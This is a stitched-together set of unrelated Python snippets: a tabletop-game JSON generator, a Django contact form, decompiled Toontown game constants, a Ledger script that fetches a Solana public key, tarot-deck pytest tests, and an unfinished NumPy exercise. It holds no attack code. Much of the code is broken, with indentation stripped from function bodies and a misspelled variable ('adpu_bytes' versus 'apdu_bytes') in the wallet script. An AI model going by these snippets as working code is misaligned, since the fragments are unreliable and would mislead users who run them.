"faceupText_ja": " - 左の「テーブルに出す」からトランプなどを取り出す\n - ドラッグで移動\n - ダブルクリックで裏返す\n - テーブルをドラッグしてスクロール\n - URLをシェアすれば招待できる\n - 左の「手札エリアを作る」で自分の手札エリアを作る\n - 手札エリアに置いたカードは自分のものになり 表にしても見えない\n - まだ不具合や未実装の部分があります。気になる点はお知らせください",
"facedownText": "How to use (double click to read)",
"facedownText_ja": "使い方 (ダブルクリックしてね)",
"draggable": True,
"flippable": True,
"ownable": False,
"resizable": True,
"zIndex": 2,
}
with open("store/default_table.json", "w", encoding="utf-8") as f:
json.dump(table, f, indent=2)
def write_initial_deploy_data_json():
registry = ComponentRegistry()
generate_toolbox(registry)
generate_note(registry)
generate_dice(registry)
generate_playing_card(registry)
generate_psychological_safety_game(registry)
generate_coin(registry)
generate_counter(registry)
generate_stones(registry)
generate_planning_poker(registry)
    generate_diamond_game(registry)
with open("initial_deploy_data.json", "w", encoding="utf-8") as f:
json.dump(registry.build_data_for_deploy(), f, indent=2)
if __name__ == "__main__":
write_default_table_json()
write_initial_deploy_data_json()
|
from django import forms
from crispy_forms.helper import FormHelper
from crispy_forms.layout import Submit
from django.core.mail import send_mail
class ContactForm(forms.Form):
name = forms.CharField(required=True)
email = forms.EmailField(required=True)
content = forms.CharField(
required=True,
widget=forms.Textarea
)
def send_email(self):
return send_mail('New Contact Message', self.cleaned_data['content'], self.cleaned_data['email'], ['[email protected]',])
def __init__(self, *args, **kwargs):
super(ContactForm, self).__init__(*args, **kwargs)
self.helper = FormHelper()
self.helper.form_id = 'id-contact-form'
self.helper.form_method = 'post'
self.helper.add_input(Submit('submit', 'Submit')) |
# uncompyle6 version 3.3.2
# Python bytecode 2.4 (62061)
# Decompiled from: Python 2.7.15 (v2.7.15:ca079a3ea3, Apr 30 2018, 16:30:26) [MSC v.1500 64 bit (AMD64)]
# Embedded file name: toontown.toonbase.ToontownGlobals
import TTLocalizer
from otp.otpbase.OTPGlobals import *
from direct.showbase.PythonUtil import Enum, invertDict
from pandac.PandaModules import BitMask32, Vec4
AccountDatabaseChannelId = 4008
ToonDatabaseChannelId = 4021
DoodleDatabaseChannelId = 4023
DefaultDatabaseChannelId = AccountDatabaseChannelId
DatabaseIdFromClassName = {'Account': AccountDatabaseChannelId}
CogHQCameraFov = 60.0
BossBattleCameraFov = 72.0
MakeAToonCameraFov = 35.0
PieBitmask = BitMask32(256)
PetBitmask = BitMask32(8)
CatchGameBitmask = BitMask32(16)
CashbotBossObjectBitmask = BitMask32(16)
FurnitureSideBitmask = BitMask32(32)
FurnitureTopBitmask = BitMask32(64)
FurnitureDragBitmask = BitMask32(128)
PetLookatPetBitmask = BitMask32(256)
PetLookatNonPetBitmask = BitMask32(512)
FullPies = 65535
CogHQCameraFar = 900.0
CogHQCameraNear = 1.0
CashbotHQCameraFar = 2000.0
CashbotHQCameraNear = 1.0
LawbotHQCameraFar = 3000.0
LawbotHQCameraNear = 1.0
SpeedwayCameraFar = 8000.0
SpeedwayCameraNear = 1.0
MaxMailboxContents = 20
MaxHouseItems = 30
ExtraDeletedItems = 5
DeletedItemLifetime = 7 * 24 * 60
CatalogNumWeeksPerSeries = 13
CatalogNumWeeks = 78
PetFloorCollPriority = 5
PetPanelProximityPriority = 6
P_WillNotFit = -13
P_NotAGift = -12
P_OnOrderListFull = -11
P_MailboxFull = -10
P_NoPurchaseMethod = -9
P_ReachedPurchaseLimit = -8
P_NoRoomForItem = -7
P_NotShopping = -6
P_NotAtMailbox = -5
P_NotInCatalog = -4
P_NotEnoughMoney = -3
P_InvalidIndex = -2
P_UserCancelled = -1
P_ItemAvailable = 1
P_ItemOnOrder = 2
P_ItemUnneeded = 3
GIFT_user = 0
GIFT_admin = 1
GIFT_RAT = 2
GIFT_mobile = 3
GIFT_cogs = 4
FM_InvalidItem = -7
FM_NondeletableItem = -6
FM_InvalidIndex = -5
FM_NotOwner = -4
FM_NotDirector = -3
FM_RoomFull = -2
FM_HouseFull = -1
FM_MovedItem = 1
FM_SwappedItem = 2
FM_DeletedItem = 3
FM_RecoveredItem = 4
SPDonaldsBoat = 3
SPMinniesPiano = 4
CEVirtual = 14
MaxHpLimit = 129
MaxCarryLimit = 80
MaxQuestCarryLimit = 4
MaxCogSuitLevel = 50 - 1
CogSuitHPLevels = (
15 - 1, 20 - 1, 30 - 1, 40 - 1, 50 - 1)
setInterfaceFont(TTLocalizer.InterfaceFont)
setSignFont(TTLocalizer.SignFont)
from toontown.toontowngui import TTDialog
setDialogClasses(TTDialog.TTDialog, TTDialog.TTGlobalDialog)
ToonFont = None
BuildingNametagFont = None
MinnieFont = None
SuitFont = None
def getToonFont():
    global ToonFont
    if ToonFont is None:
        ToonFont = loader.loadFont(TTLocalizer.ToonFont, lineHeight=1.0)
    return ToonFont
def getBuildingNametagFont():
    global BuildingNametagFont
    if BuildingNametagFont is None:
        BuildingNametagFont = loader.loadFont(TTLocalizer.BuildingNametagFont)
    return BuildingNametagFont
def getMinnieFont():
    global MinnieFont
    if MinnieFont is None:
        MinnieFont = loader.loadFont(TTLocalizer.MinnieFont)
    return MinnieFont
def getSuitFont():
    global SuitFont
    if SuitFont is None:
        SuitFont = loader.loadFont(TTLocalizer.SuitFont, pixelsPerUnit=40, spaceAdvance=0.25, lineHeight=1.0)
    return SuitFont
DonaldsDock = 1000
ToontownCentral = 2000
TheBrrrgh = 3000
MinniesMelodyland = 4000
DaisyGardens = 5000
ConstructionZone = 6000
FunnyFarm = 7000
GoofySpeedway = 8000
DonaldsDreamland = 9000
BarnacleBoulevard = 1100
SeaweedStreet = 1200
LighthouseLane = 1300
SillyStreet = 2100
LoopyLane = 2200
PunchlinePlace = 2300
WalrusWay = 3100
SleetStreet = 3200
PolarPlace = 3300
AltoAvenue = 4100
BaritoneBoulevard = 4200
TenorTerrace = 4300
ElmStreet = 5100
MapleStreet = 5200
OakStreet = 5300
LullabyLane = 9100
PajamaPlace = 9200
HoodHierarchy = {ToontownCentral: (SillyStreet, LoopyLane, PunchlinePlace), DonaldsDock: (BarnacleBoulevard, SeaweedStreet, LighthouseLane), TheBrrrgh: (WalrusWay, SleetStreet, PolarPlace), MinniesMelodyland: (AltoAvenue, BaritoneBoulevard, TenorTerrace), DaisyGardens: (ElmStreet, MapleStreet, OakStreet), DonaldsDreamland: (LullabyLane, PajamaPlace), GoofySpeedway: ()}
WelcomeValleyToken = 0
BossbotHQ = 10000
BossbotLobby = 10100
SellbotHQ = 11000
SellbotLobby = 11100
SellbotFactoryExt = 11200
SellbotFactoryInt = 11500
CashbotHQ = 12000
CashbotLobby = 12100
CashbotMintIntA = 12500
CashbotMintIntB = 12600
CashbotMintIntC = 12700
LawbotHQ = 13000
LawbotLobby = 13100
LawbotOfficeExt = 13200
LawbotOfficeInt = 13300
LawbotStageIntA = 13300
LawbotStageIntB = 13400
LawbotStageIntC = 13500
LawbotStageIntD = 13600
Tutorial = 15000
MyEstate = 16000
WelcomeValleyBegin = 22000
WelcomeValleyEnd = 61000
DynamicZonesBegin = 61000
DynamicZonesEnd = 1 << 20
cogDept2index = {'c': 0, 'l': 1, 'm': 2, 's': 3}
cogIndex2dept = invertDict(cogDept2index)
HQToSafezone = {SellbotHQ: DaisyGardens, CashbotHQ: DonaldsDreamland, LawbotHQ: TheBrrrgh, BossbotHQ: DonaldsDock}
CogDeptNames = [
TTLocalizer.Bossbot, TTLocalizer.Lawbot, TTLocalizer.Cashbot, TTLocalizer.Sellbot]
def cogHQZoneId2deptIndex(zone):
    if 13000 <= zone <= 13999:
        return 1
    if 12000 <= zone < 13000:
        return 2
    if 11000 <= zone < 12000:
        return 3
    return 0
def cogHQZoneId2dept(zone):
return cogIndex2dept[cogHQZoneId2deptIndex(zone)]
def dept2cogHQ(dept):
dept2hq = {'c': BossbotHQ, 'l': LawbotHQ, 'm': CashbotHQ, 's': SellbotHQ}
return dept2hq[dept]
MockupFactoryId = 0
MintNumFloors = {CashbotMintIntA: 20, CashbotMintIntB: 20, CashbotMintIntC: 20}
CashbotMintCogLevel = 10
CashbotMintSkelecogLevel = 11
CashbotMintBossLevel = 12
MintNumBattles = {CashbotMintIntA: 4, CashbotMintIntB: 6, CashbotMintIntC: 8}
MintCogBuckRewards = {CashbotMintIntA: 8, CashbotMintIntB: 14, CashbotMintIntC: 20}
MintNumRooms = {CashbotMintIntA: 2 * (6,) + 5 * (7,) + 5 * (8,) + 5 * (9,) + 3 * (10,), CashbotMintIntB: 3 * (8,) + 6 * (9,) + 6 * (10,) + 5 * (11,), CashbotMintIntC: 4 * (10,) + 10 * (11,) + 6 * (12,)}
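# (The tuple arithmetic above builds weighted pools of per-floor room counts:
# e.g. 2 * (6,) + 5 * (7,) expands to (6, 6, 7, 7, 7, 7, 7), from which a
# floor's room count is presumably drawn at random elsewhere.)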
LawbotStageCogLevel = 10
LawbotStageSkelecogLevel = 11
LawbotStageBossLevel = 12
StageNumBattles = {LawbotStageIntA: 0, LawbotStageIntB: 0, LawbotStageIntC: 0, LawbotStageIntD: 0}
StageNoticeRewards = {LawbotStageIntA: 75, LawbotStageIntB: 150, LawbotStageIntC: 225, LawbotStageIntD: 300}
StageNumRooms = {LawbotStageIntA: 2 * (6,) + 5 * (7,) + 5 * (8,) + 5 * (9,) + 3 * (10,), LawbotStageIntB: 3 * (8,) + 6 * (9,) + 6 * (10,) + 5 * (11,), LawbotStageIntC: 4 * (10,) + 10 * (11,) + 6 * (12,), LawbotStageIntD: 4 * (10,) + 10 * (11,) + 6 * (12,)}
FT_FullSuit = 'fullSuit'
FT_Leg = 'leg'
FT_Arm = 'arm'
FT_Torso = 'torso'
factoryId2factoryType = {MockupFactoryId: FT_FullSuit, SellbotFactoryInt: FT_FullSuit, LawbotOfficeInt: FT_FullSuit}
StreetNames = TTLocalizer.GlobalStreetNames
StreetBranchZones = StreetNames.keys()
Hoods = (
DonaldsDock, ToontownCentral, TheBrrrgh, MinniesMelodyland, DaisyGardens, ConstructionZone, FunnyFarm, GoofySpeedway, DonaldsDreamland, BossbotHQ, SellbotHQ, CashbotHQ, LawbotHQ)
NoPreviousGameId = 0
RaceGameId = 1
CannonGameId = 2
TagGameId = 3
PatternGameId = 4
RingGameId = 5
MazeGameId = 6
TugOfWarGameId = 7
CatchGameId = 8
DivingGameId = 9
TargetGameId = 10
PairingGameId = 11
VineGameId = 12
TravelGameId = 100
MinigameNames = {'race': RaceGameId, 'cannon': CannonGameId, 'tag': TagGameId, 'pattern': PatternGameId, 'minnie': PatternGameId, 'match': PatternGameId, 'matching': PatternGameId, 'ring': RingGameId, 'maze': MazeGameId, 'tug': TugOfWarGameId, 'catch': CatchGameId, 'diving': DivingGameId, 'target': TargetGameId, 'pairing': PairingGameId, 'vine': VineGameId, 'travel': TravelGameId}
MinigameTemplateId = -1
MinigameIDs = (
RaceGameId, CannonGameId, TagGameId, PatternGameId, RingGameId, MazeGameId, TugOfWarGameId, CatchGameId, DivingGameId, TargetGameId, PairingGameId, VineGameId, TravelGameId)
MinigamePlayerMatrix = {1: (CannonGameId, RingGameId, MazeGameId, TugOfWarGameId, CatchGameId, DivingGameId, TargetGameId, PairingGameId, VineGameId), 2: (CannonGameId, PatternGameId, RingGameId, TagGameId, MazeGameId, TugOfWarGameId, CatchGameId, DivingGameId, TargetGameId, PairingGameId, VineGameId), 3: (CannonGameId, PatternGameId, RingGameId, TagGameId, RaceGameId, MazeGameId, TugOfWarGameId, CatchGameId, DivingGameId, TargetGameId, PairingGameId, VineGameId), 4: (CannonGameId, PatternGameId, RingGameId, TagGameId, RaceGameId, MazeGameId, TugOfWarGameId, CatchGameId, DivingGameId, TargetGameId, PairingGameId, VineGameId)}
KeyboardTimeout = 300
phaseMap = {Tutorial: 4, ToontownCentral: 4, MyEstate: 5.5, DonaldsDock: 6, MinniesMelodyland: 6, GoofySpeedway: 6, TheBrrrgh: 8, DaisyGardens: 8, FunnyFarm: 8, DonaldsDreamland: 8, ConstructionZone: 8, BossbotHQ: 9, SellbotHQ: 9, CashbotHQ: 10, LawbotHQ: 11}
streetPhaseMap = {ToontownCentral: 5, DonaldsDock: 6, MinniesMelodyland: 6, GoofySpeedway: 6, TheBrrrgh: 8, DaisyGardens: 8, FunnyFarm: 8, DonaldsDreamland: 8, ConstructionZone: 8, BossbotHQ: 9, SellbotHQ: 9, CashbotHQ: 10, LawbotHQ: 11}
dnaMap = {Tutorial: 'toontown_central', ToontownCentral: 'toontown_central', DonaldsDock: 'donalds_dock', MinniesMelodyland: 'minnies_melody_land', GoofySpeedway: 'goofy_speedway', TheBrrrgh: 'the_burrrgh', DaisyGardens: 'daisys_garden', FunnyFarm: 'not done yet', DonaldsDreamland: 'donalds_dreamland', ConstructionZone: 'not done yet', BossbotHQ: 'cog_hq_bossbot', SellbotHQ: 'cog_hq_sellbot', CashbotHQ: 'cog_hq_cashbot', LawbotHQ: 'cog_hq_lawbot'}
hoodNameMap = {DonaldsDock: TTLocalizer.DonaldsDock, ToontownCentral: TTLocalizer.ToontownCentral, TheBrrrgh: TTLocalizer.TheBrrrgh, MinniesMelodyland: TTLocalizer.MinniesMelodyland, DaisyGardens: TTLocalizer.DaisyGardens, ConstructionZone: TTLocalizer.ConstructionZone, FunnyFarm: TTLocalizer.FunnyFarm, GoofySpeedway: TTLocalizer.GoofySpeedway, DonaldsDreamland: TTLocalizer.DonaldsDreamland, BossbotHQ: TTLocalizer.BossbotHQ, SellbotHQ: TTLocalizer.SellbotHQ, CashbotHQ: TTLocalizer.CashbotHQ, LawbotHQ: TTLocalizer.LawbotHQ, Tutorial: TTLocalizer.Tutorial, MyEstate: TTLocalizer.MyEstate}
safeZoneCountMap = {MyEstate: 8, Tutorial: 6, ToontownCentral: 6, DonaldsDock: 10, MinniesMelodyland: 5, GoofySpeedway: 500, TheBrrrgh: 8, DaisyGardens: 9, FunnyFarm: 500, DonaldsDreamland: 5, ConstructionZone: 500}
townCountMap = {MyEstate: 8, Tutorial: 40, ToontownCentral: 37, DonaldsDock: 40, MinniesMelodyland: 40, GoofySpeedway: 40, TheBrrrgh: 40, DaisyGardens: 40, FunnyFarm: 40, DonaldsDreamland: 40, ConstructionZone: 40}
hoodCountMap = {MyEstate: 2, Tutorial: 2, ToontownCentral: 2, DonaldsDock: 2, MinniesMelodyland: 2, GoofySpeedway: 2, TheBrrrgh: 2, DaisyGardens: 2, FunnyFarm: 2, DonaldsDreamland: 2, ConstructionZone: 2, BossbotHQ: 2, SellbotHQ: 43, CashbotHQ: 2, LawbotHQ: 2}
TrophyStarLevels = (
10, 20, 30, 50, 75, 100)
TrophyStarColors = (
Vec4(0.9, 0.6, 0.2, 1), Vec4(0.9, 0.6, 0.2, 1), Vec4(0.8, 0.8, 0.8, 1), Vec4(0.8, 0.8, 0.8, 1), Vec4(1, 1, 0, 1), Vec4(1, 1, 0, 1))
MickeySpeed = 5.0
MinnieSpeed = 3.2
DonaldSpeed = 3.68
DaisySpeed = 2.3
GoofySpeed = 5.2
PlutoSpeed = 5.5
SuitWalkSpeed = 4.8
PieCodeBossCog = 1
PieCodeNotBossCog = 2
PieCodeToon = 3
PieCodeBossInsides = 4
PieCodeDefensePan = 5
PieCodeProsecutionPan = 6
PieCodeLawyer = 7
PieCodeColors = {PieCodeBossCog: None, PieCodeNotBossCog: (0.8, 0.8, 0.8, 1), PieCodeToon: None}
BossCogRollSpeed = 7.5
BossCogTurnSpeed = 20
BossCogTreadSpeed = 3.5
BossCogDizzy = 0
BossCogElectricFence = 1
BossCogSwatLeft = 2
BossCogSwatRight = 3
BossCogAreaAttack = 4
BossCogFrontAttack = 5
BossCogRecoverDizzyAttack = 6
BossCogDirectedAttack = 7
BossCogStrafeAttack = 8
BossCogNoAttack = 9
BossCogGoonZap = 10
BossCogSlowDirectedAttack = 11
BossCogDizzyNow = 12
BossCogGavelStomp = 13
BossCogGavelHandle = 14
BossCogLawyerAttack = 15
BossCogAttackTimes = {BossCogElectricFence: 0, BossCogSwatLeft: 5.5, BossCogSwatRight: 5.5, BossCogAreaAttack: 4.21, BossCogFrontAttack: 2.65, BossCogRecoverDizzyAttack: 5.1, BossCogDirectedAttack: 4.84, BossCogNoAttack: 6, BossCogSlowDirectedAttack: 7.84}
BossCogDamageLevels = {BossCogElectricFence: 1, BossCogSwatLeft: 5, BossCogSwatRight: 5, BossCogAreaAttack: 10, BossCogFrontAttack: 3, BossCogRecoverDizzyAttack: 3, BossCogDirectedAttack: 3, BossCogStrafeAttack: 2, BossCogGoonZap: 5, BossCogSlowDirectedAttack: 10, BossCogGavelStomp: 20, BossCogGavelHandle: 2, BossCogLawyerAttack: 5}
BossCogBattleAPosHpr = (
0, -25, 0, 0, 0, 0)
BossCogBattleBPosHpr = (0, 25, 0, 180, 0, 0)
SellbotBossMaxDamage = 100
SellbotBossBattleOnePosHpr = (
0, -35, 0, -90, 0, 0)
SellbotBossBattleTwoPosHpr = (0, 60, 18, -90, 0, 0)
SellbotBossBattleThreeHpr = (180, 0, 0)
SellbotBossBottomPos = (0, -110, -6.5)
SellbotBossDeathPos = (0, -175, -6.5)
SellbotBossDooberTurnPosA = (
-20, -50, 0)
SellbotBossDooberTurnPosB = (20, -50, 0)
SellbotBossDooberTurnPosDown = (0, -50, 0)
SellbotBossDooberFlyPos = (0, -135, -6.5)
SellbotBossTopRampPosA = (
-80, -35, 18)
SellbotBossTopRampTurnPosA = (-80, 10, 18)
SellbotBossP3PosA = (-50, 40, 18)
SellbotBossTopRampPosB = (80, -35, 18)
SellbotBossTopRampTurnPosB = (80, 10, 18)
SellbotBossP3PosB = (50, 60, 18)
CashbotBossMaxDamage = 500
CashbotBossOffstagePosHpr = (
120, -195, 0, 0, 0, 0)
CashbotBossBattleOnePosHpr = (120, -230, 0, 90, 0, 0)
CashbotRTBattleOneStartPosHpr = (94, -220, 0, 110, 0, 0)
CashbotBossBattleThreePosHpr = (120, -315, 0, 180, 0, 0)
CashbotToonsBattleThreeStartPosHpr = [
(
105, -285, 0, 208, 0, 0), (136, -342, 0, 398, 0, 0), (105, -342, 0, 333, 0, 0), (135, -292, 0, 146, 0, 0), (93, -303, 0, 242, 0, 0), (144, -327, 0, 64, 0, 0), (145, -302, 0, 117, 0, 0), (93, -327, 0, -65, 0, 0)]
CashbotBossSafePosHprs = [
(
120, -315, 30, 0, 0, 0), (77.2, -329.3, 0, -90, 0, 0), (77.1, -302.7, 0, -90, 0, 0), (165.7, -326.4, 0, 90, 0, 0), (165.5, -302.4, 0, 90, 0, 0), (107.8, -359.1, 0, 0, 0, 0), (133.9, -359.1, 0, 0, 0, 0), (107.0, -274.7, 0, 180, 0, 0), (134.2, -274.7, 0, 180, 0, 0)]
CashbotBossCranePosHprs = [
(
97.4, -337.6, 0, -45, 0, 0), (97.4, -292.4, 0, -135, 0, 0), (142.6, -292.4, 0, 135, 0, 0), (142.6, -337.6, 0, 45, 0, 0)]
CashbotBossToMagnetTime = 0.2
CashbotBossFromMagnetTime = 1
CashbotBossSafeKnockImpact = 0.5
CashbotBossSafeNewImpact = 0.0
CashbotBossGoonImpact = 0.1
CashbotBossKnockoutDamage = 15
TTWakeWaterHeight = -4.79
DDWakeWaterHeight = 1.669
EstateWakeWaterHeight = -0.3
WakeRunDelta = 0.1
WakeWalkDelta = 0.2
NoItems = 0
NewItems = 1
OldItems = 2
SuitInvasionBegin = 0
SuitInvasionUpdate = 1
SuitInvasionEnd = 2
SuitInvasionBulletin = 3
NO_HOLIDAY = 0
JULY4_FIREWORKS = 1
NEWYEARS_FIREWORKS = 2
HALLOWEEN = 3
WINTER_DECORATIONS = 4
SKELECOG_INVASION = 5
MR_HOLLYWOOD_INVASION = 6
FISH_BINGO_NIGHT = 7
ELECTION_PROMOTION = 8
BLACK_CAT_DAY = 9
RESISTANCE_EVENT = 10
KART_RECORD_DAILY_RESET = 11
KART_RECORD_WEEKLY_RESET = 12
TRICK_OR_TREAT = 13
CIRCUIT_RACING = 14
POLAR_PLACE_EVENT = 15
CIRCUIT_RACING_EVENT = 16
TROLLEY_HOLIDAY = 17
TROLLEY_WEEKEND = 18
JULY22_FIREWORKS = 201
JULY23_FIREWORKS = 202
JULY25_FIREWORKS = 203
JULY30_FIREWORKS = 204
JULY31_FIREWORKS = 205
AUGUST1_FIREWORKS = 206
AUGUST3_FIREWORKS = 207
AUGUST5_FIREWORKS = 208
AUGUST7_FIREWORKS = 209
AUGUST8_FIREWORKS = 210
AUGUST10_FIREWORKS = 211
AUGUST13_FIREWORKS = 212
AUGUST14_FIREWORKS = 213
AUGUST16_FIREWORKS = 214
AUGUST31_FIREWORKS = 215
OCTOBER31_FIREWORKS = 31
NOVEMBER19_FIREWORKS = 32
FEBRUARY14_FIREWORKS = 51
JULY14_FIREWORKS = 52
JUNE22_FIREWORKS = 53
BIGWIG_INVASION = 54
TOT_REWARD_JELLYBEAN_AMOUNT = 100
TOT_REWARD_END_OFFSET_AMOUNT = 0
LawbotBossMaxDamage = 2700
LawbotBossWinningTilt = 40
LawbotBossInitialDamage = 1350
LawbotBossBattleOnePosHpr = (
-2.798, -60, 0, 0, 0, 0)
LawbotBossBattleTwoPosHpr = (
-2.798, 89, 19.145, 0, 0, 0)
LawbotBossTopRampPosA = (
-80, -35, 18)
LawbotBossTopRampTurnPosA = (-80, 10, 18)
LawbotBossP3PosA = (
55, -9, 0)
LawbotBossTopRampPosB = (80, -35, 18)
LawbotBossTopRampTurnPosB = (80, 10, 18)
LawbotBossP3PosB = (
55, -9, 0)
LawbotBossBattleThreePosHpr = LawbotBossBattleTwoPosHpr
LawbotBossBottomPos = (
50, 39, 0)
LawbotBossDeathPos = (50, 40, 0)
LawbotBossGavelPosHprs = [
(
35, 78.328, 0, -135, 0, 0), (68.5, 78.328, 0, 135, 0, 0), (47, -33, 0, 45, 0, 0), (-50, -39, 0, -45, 0, 0), (-9, -37, 0, 0, 0, 0), (-9, 49, 0, -180, 0, 0), (32, 0, 0, 45, 0, 0), (33, 56, 0, 135, 0, 0)]
LawbotBossGavelTimes = [
(
0.2, 0.9, 0.6), (0.25, 1, 0.5), (1.0, 6, 0.5), (0.3, 3, 1), (0.26, 0.9, 0.45), (0.24, 1.1, 0.65), (0.27, 1.2, 0.45), (0.25, 0.95, 0.5)]
LawbotBossGavelHeadings = [
(
0, -15, 4, -70 - 45, 5, 45), (0, -45, -4, -35, -45, -16, 32), (0, -8, 19, -7, 5, 23), (0, -4, 8, -16, 32, -45, 7, 7, -30, 19, -13, 25), (0, -45, -90, 45, 90), (0, -45, -90, 45, 90), (0, -45, 45), (0, -45, 45)]
LawbotBossCogRelBattleAPosHpr = (
-25, -10, 0, 0, 0, 0)
LawbotBossCogRelBattleBPosHpr = (-25, 10, 0, 0, 0, 0)
LawbotBossCogAbsBattleAPosHpr = (
-5, -2, 0, 0, 0, 0)
LawbotBossCogAbsBattleBPosHpr = (-5, 0, 0, 0, 0, 0)
LawbotBossWitnessStandPosHpr = (
54, 100, 0, -90, 0, 0)
LawbotBossInjusticePosHpr = (
-3, 12, 0, 90, 0, 0)
LawbotBossInjusticeScale = (1.75, 1.75, 1.5)
LawbotBossDefensePanDamage = 1
LawbotBossLawyerPosHprs = [
(
-57, -24, 0, -90, 0, 0), (-57, -12, 0, -90, 0, 0), (-57, 0, 0, -90, 0, 0), (-57, 12, 0, -90, 0, 0), (-57, 24, 0, -90, 0, 0), (-57, 36, 0, -90, 0, 0), (-57, 48, 0, -90, 0, 0), (-57, 60, 0, -90, 0, 0), (-3, -37.3, 0, 0, 0, 0), (-3, 53, 0, -180, 0, 0)]
LawbotBossLawyerCycleTime = 6
LawbotBossLawyerToPanTime = 2.5
LawbotBossLawyerChanceToAttack = 50
LawbotBossLawyerHeal = 2
LawbotBossLawyerStunTime = 5
LawbotBossDifficultySettings = [
(
38, 4, 8, 1, 0, 0), (36, 5, 8, 1, 0, 0), (34, 5, 8, 1, 0, 0), (32, 6, 8, 2, 0, 0), (30, 6, 8, 2, 0, 0), (28, 7, 8, 3, 0, 0), (26, 7, 9, 3, 1, 1), (24, 8, 9, 4, 1, 1), (22, 8, 10, 4, 1, 0)]
LawbotBossCannonPosHprs = [
(
-40, -12, 0, -90, 0, 0), (-40, 0, 0, -90, 0, 0), (-40, 12, 0, -90, 0, 0), (-40, 24, 0, -90, 0, 0), (-40, 36, 0, -90, 0, 0), (-40, 48, 0, -90, 0, 0), (-40, 60, 0, -90, 0, 0), (-40, 72, 0, -90, 0, 0)]
LawbotBossCannonPosA = (
-80, -51.48, 0)
LawbotBossCannonPosB = (-80, 70.73, 0)
LawbotBossChairPosHprs = [
(
60, 72, 0, -90, 0, 0), (60, 62, 0, -90, 0, 0), (60, 52, 0, -90, 0, 0), (60, 42, 0, -90, 0, 0), (60, 32, 0, -90, 0, 0), (60, 22, 0, -90, 0, 0), (70, 72, 5, -90, 0, 0), (70, 62, 5, -90, 0, 0), (70, 52, 5, -90, 0, 0), (70, 42, 5, -90, 0, 0), (70, 32, 5, -90, 0, 0), (70, 22, 5, -90, 0, 0)]
LawbotBossChairRow1PosB = (
59.3, 48, 14.05)
LawbotBossChairRow1PosA = (59.3, -18.2, 14.05)
LawbotBossChairRow2PosB = (75.1, 48, 28.2)
LawbotBossChairRow2PosA = (75.1, -18.2, 28.2)
LawbotBossCannonBallMax = 12
LawbotBossJuryBoxStartPos = (
94, -8, 5)
LawbotBossJuryBoxRelativeEndPos = (30, 0, 12.645)
LawbotBossJuryBoxMoveTime = 70
LawbotBossJurorsForBalancedScale = 8
LawbotBossDamagePerJuror = 68
LawbotBossCogJurorFlightTime = 10
LawbotBossCogJurorDistance = 75
LawbotBossBaseJurorNpcId = 2001
LawbotBossWitnessEpiloguePosHpr = (
-3, 0, 0, 180, 0, 0)
LawbotBossChanceForTaunt = 25
LawbotBossBonusWaitTime = 60
LawbotBossBonusDuration = 20
LawbotBossBonusToonup = 10
LawbotBossBonusWeightMultiplier = 2
LawbotBossChanceToDoAreaAttack = 11
LOW_POP_NTT = 0
MID_POP_NTT = 100
HIGH_POP_NTT = 200
LOW_POP = 399
MID_POP = 499
HIGH_POP = -1
PinballCannonBumper = 0
PinballCloudBumperLow = 1
PinballCloudBumperMed = 2
PinballCloudBumperHigh = 3
PinballTarget = 4
PinballRoof = 5
PinballHouse = 6
PinballFence = 7
PinballBridge = 8
PinballStatuary = 9
PinballScoring = [
(
100, 1), (150, 1), (200, 1), (250, 1), (350, 1), (100, 1), (50, 1), (25, 1), (100, 1), (10, 1)]
PinballCannonBumperInitialPos = (
0, -20, 40)
RentalCop = 0
RentalCannon = 1
GlitchKillerZones = [
13300, 13400, 13500, 13600]
ColorPlayer = (
0.3, 0.7, 0.3, 1)
ColorAvatar = (0.3, 0.3, 0.7, 1)
ColorPet = (0.6, 0.4, 0.2, 1)
ColorFreeChat = (
0.3, 0.3, 0.8, 1)
ColorSpeedChat = (0.2, 0.6, 0.4, 1)
ColorNoChat = (0.8, 0.5, 0.1, 1) |
import random
names = ['Ethan', 'Kurt', 'Eric']
random.shuffle(names)
print(names)
|
#!/usr/bin/env python
from ledgerblue.comm import getDongle
import argparse
from binascii import unhexlify
import base58
parser = argparse.ArgumentParser()
parser.add_argument('--account_number', help="BIP32 account to retrieve. e.g. \"12345\".")
args = parser.parse_args()
if args.account_number is None:
args.account_number = "12345"
derivation_path = [44, 501, int(args.account_number)]
derivation_path_hex = '{:02x}'.format(len(derivation_path)) + "".join('{:02x}'.format(x | 0x80000000) for x in derivation_path)
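# Worked example (hedged, using the default account 12345):
#   [44, 501, 12345] hardened -> 0x8000002c, 0x800001f5, 0x80003039
#   derivation_path_hex == "038000002c800001f580003039"
#   (one length byte followed by three 4-byte hardened indices)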
# Create APDU message.
# CLA 0xE0
# INS 0x02 GET_PUBKEY
# P1 0x00 NO USER CONFIRMATION REQUIRED (0x01 otherwise)
# P2 0x00 UNUSED
payload_hex = derivation_path_hex
adpu_hex = "E0020000" + '{:02x}'.format(len(payload_hex) / 2) + payload_hex
adpu_bytes = bytearray.fromhex(adpu_hex)
print("~~ Ledger Solana ~~")
print("Request Pubkey")
dongle = getDongle(True)
result = dongle.exchange(apdu_bytes)[0:32]
# b58encode returns bytes on Python 3; decode for printing
print("Pubkey received: " + base58.b58encode(bytes(result)).decode())
|
from copy import deepcopy
import tarotbot.cards as cards
import pytest
new_deck = lambda: deepcopy(cards.Deck(cards.tarot_deck))
#def test_deck_draw_returns_card():
# assert type(deepcopy(cards.Deck(cards.tarot_deck)).draw()) == cards.Card
def test_deck_draw_exhausts_deck():
deck = deepcopy(cards.Deck(cards.tarot_deck))
with pytest.raises(IndexError):
for c in range(79):
deck.draw()
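    # (A tarot deck holds 78 cards -- test_remaining below implies the same --
    # so it is the 79th draw that raises IndexError.)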
def test_return_returns_card():
deck = deepcopy(cards.Deck(cards.tarot_deck))
d_card = deck.draw()[0]
    assert d_card not in deck.curr_deck
deck.return_card(0)
assert d_card in deck.curr_deck
def test_draw_can_draw_several_cards():
deck = new_deck()
d_cards = deck.draw(3)
assert len(d_cards) == 3
assert type(d_cards[0]) == cards.Card
def test_list_discards():
deck = new_deck()
d_cards = deck.draw(3)
assert len(deck.discards) == 3
assert type(deck.discards[0]) == cards.Card
assert d_cards[0] in deck.discards
def test_remaining():
deck = new_deck()
deck.draw(3)
assert deck.remaining() == 75 |
'''
We will assume that fertility is a linear function of the female illiteracy rate. That is, f=ai+b, where a is the slope and b
is the intercept. We can think of the intercept as the minimal fertility rate, probably somewhere between one and two. The slope tells us how the fertility rate varies with illiteracy. We can find the best fit line using np.polyfit().
Plot the data and the best fit line. Print out the slope and intercept. (Think: what are their units?)
'''
# Hedged assumption: illiteracy and fertility are 1-D NumPy arrays
# prepared earlier in the exercise.
import numpy as np
import matplotlib.pyplot as plt

